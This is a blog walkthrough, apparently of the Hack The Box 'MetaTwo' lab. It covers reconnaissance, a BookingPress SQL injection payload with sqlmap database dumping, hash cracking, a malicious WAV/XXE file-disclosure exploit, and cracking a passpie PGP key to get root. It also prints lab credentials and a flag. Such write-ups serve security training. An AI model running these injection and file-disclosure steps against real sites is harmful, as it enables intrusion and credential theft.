Open in app

Sign in

Write

Sign in

Home

Following

Library

Stories

Stats

MetaTwo — HTB [Easy]

Aks
8 min readApr 27, 2023

STEP 1 — Information Gathering & Enumeration

nmap -T4 -sC -sV  -p- 10.10.11.186 -oX htbMeta.xml

=> discover open ports: 21, 22, 80

=> doing another scanning on port 80 using:

nmap -T4 -sC -sV 10.10.11.186 -p80

disclocusure wordpress version 5.6.2

then, I try to access port 80 so I should add the Ip Address to etc/hosts/ first

after that I can access the website on port 80, the UI look like below:

The next step I try to bruteforcing some hidden directory from the target using gobuster

gobuster dir -u http://metapress.htb -w /usr/share/wordlists/dirb/common.txt -x pdf,png,jpg,txt,php

=> some directory got 200 status code: /.htaccess, license.txt, robots.txt, wp-config.php, wp-cron.php, /wplinks-opml.php, /wp-load.php & /wp-login.php.

STEP 2 — Vulnerability Identification & Analysis

For this phase, first I try using searchploit to identify what kind of possibility of vulnerability that wordpress version 5.6.2 have.

searchploit wordpress 5.6.2

=> discover some vulnerability on wordpress plugin, then I try to access /wp-login .php to inspect the element of code also to find any deprecated plugin

As you can see from the pic above, there’s some plugin called bookingpress ver=1.0.10. After search some information from google, I found some correlation about this information with CVE-2022–0739:

- https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
- https://github.com/destr4ct/CVE-2022-0739
- https://patchstack.com/database/vulnerability/bookingpress-appointment-booking/wordpress-bookingpress-plugin-1-0-10-unauthenticated-sql-injection-sqli-vulnerability

Then to exploit the target, first we gather _wpnonce from the source code

=> _wpnonce:’0dbd7f3b66'

STEP 3 — Exploitation

Capture the request payload using curl with burpsuite

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=0dbd7f3b66&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' -x http://127.0.0.1:8080

Copy the capture req to file and name it ‘admin.req’ or whatever you like.

edit the ‘admin.req’ look like this

Run the sqlmap

sqlmap -r admin.req -p total_service --batch

found vulnerability database from the target

Again run sqlmap to inject the params

sqlmap -r admin.req -p total_service --dbs

found 2 db from the target called ‘blog’ and ‘information_schema’

Another sqlmap to get db tables

sqlmap -r admin.req -p total_service -D blog --tables

discovery db ‘blog’ tables

Next, run another sqlmap to dump wp_users

sqlmap -r admin.req -p total_service -D blog -T wp_users --dump

Found some creds from the tables called ‘user_pass’, ‘user_email’, ‘user_login’.

As you can see, we get the creds but they hashed so to see real value from the ‘user_pass’ we can using John The Ripper to crack the hash.

john MetaPassHash -w= /usr/share/wordlist/rockyou.txt

Then, I try to log in with that creds to ftp on port 21 but it’s failed

Another attempt we can try to /wp-login.php with same creds and we successfully login to /wp-login.php.

Inside /wp-login.php there’s some feature called ‘Media’ and we can upload some file like .WAV, the interesting point is another correlation CVE-2021–29447 with this case where we can reverse connection using vulnerability WAV file.

CVE-2021–29447: Vulnerability allow a authenticated user whith low privilages upload a malicious WAV file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF)

Create wav file and file called ‘dedsec.dtd’ or whatever you like

Upload the wav file to the media on the web and start php server to listening

=> php -S 0.0.0.0:90001
=> upload payload.wav

=> Got reverse connection from the system > from that we got encode ‘base64’

=> Decode the value > echo -n ‘base 64 value’ | base64 -d

=> modify dedsec.dtd to nginx started

=> got the base64 value and decoded again > echo -n ‘base64 value’ | base64 -d

=> found root /var/www/metapress.htb/blog

=> Again modify the dedsect.dtd and direct to /var/www/metapress.htb/blog

=> got the base64 value and decoded again > echo -n ‘base64 value’ | base64 -d

=> found some credentials for ftp:

define( ‘FS_METHOD’, ‘ftpext’ );
define( ‘FTP_USER’, ‘metapress.htb’ );
define( ‘FTP_PASS’, ‘9NYS_ii@FyL_p5M2NvJ’ );
define( ‘FTP_HOST’, ‘ftp.metapress.htb’ );
define( ‘FTP_BASE’, ‘blog/’ );
define( ‘FTP_SSL’, false );

=> Try to connect ftp — <Successfully Login>
— ftp 10.10.11.186
— Name: metapress.htb
— Password: 9NYS_ii@FyL_p5M2NvJ

found some interesting file called ‘send_email.php’ in directory ‘mailer

cat send_email.php > found another interesting information:
=> $mail->Host = “mail.metapress.htb”;
$mail->SMTPAuth = true;
$mail->Username = “jnelson@metapress.htb”;
$mail->Password = “Cb4_JmWM8zUZWMu@Ys”;
$mail->SMTPSecure = “tls”;
$mail->Port = 587;

$mail->From = “jnelson@metapress.htb”;
$mail->FromName = “James Nelson”;

$mail->addAddress(“info@metapress.htb”);

=> From that credentials, I try to login ssh — <Successfully Login>
— Username: jnelson
— Password: Cb4_JmWM8zUZWMu@Ys
— Got user.txt

STEP 4— Privilege Escalation

=> ls -la and found unique directory called ‘passpie’

Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface. Use a master passphrase to decrypt login credentials, copy passwords to clipboard, syncronize with a git repository, check the state of your passwords, and more.

Using passpie search. & passpie config to list some information then also using command > find . -wholename “*ssh/root*” and found ./.passpie/ssh/root.pass

Then get ./.passpie/ssh/root.pass using command > cat ./.passpie/ssh/root.pass

  • transfer the keys to our machine > scp jnelson@10.10.11.186:.passpie/.keys .keys
  • then cat .keys and we can see public and private PGP key
  • transfer the private key from ssh to local env > scp jnelson@ 10.10.11.186:/home/jnelson/.keys /home/aks28/
  • - find the keys: [v]
    find -name “*.keys*”
    ./.local/share/keyrings/user.keystore
    ./.keys
    => then cat ./.keys

Delete the public key then convert .keys to .john > gpg2john ./.keys > PGPprivateKey.john

crack the private key with john the ripper > john PGBprivateKey.john -w=/usr/share/wordlists/rockyou.txt

get the result from JTR > blink182 | (Passpie)

After we get creds for passpie, now we can see the password from passpie table:

=> touch pass
=> passpie export pass
=> password: blink182
=> cat pass:
— comment: ‘’
— fullname: root@ssh
— login: root
— modified: 2022–06–26 08:58:15.621572
— name: ssh
— password: !!python/unicode ‘p7qfAZt4_A1xo_0x’

— comment: ‘’
— fullname: jnelson@ssh
— login: jnelson
— modified: 2022–06–26 08:58:15.514422
— name: ssh
— password: !!python/unicode ‘Cb4_JmWM8zUZWMu@Ys’

handler: passpie
version: 1.0

  • Now we can get the root:

=> su root
=> password: p7qfAZt4_A1xo_0x
=> get root.txt > cat /root/root.txt >> 1ce965673e694464252b209227a4cccf

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Aks
Aks

Written by Aks

35 Followers
10 Following

<¿>

No responses yet

More from Aks

See all from Aks

Recommended from Medium

See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech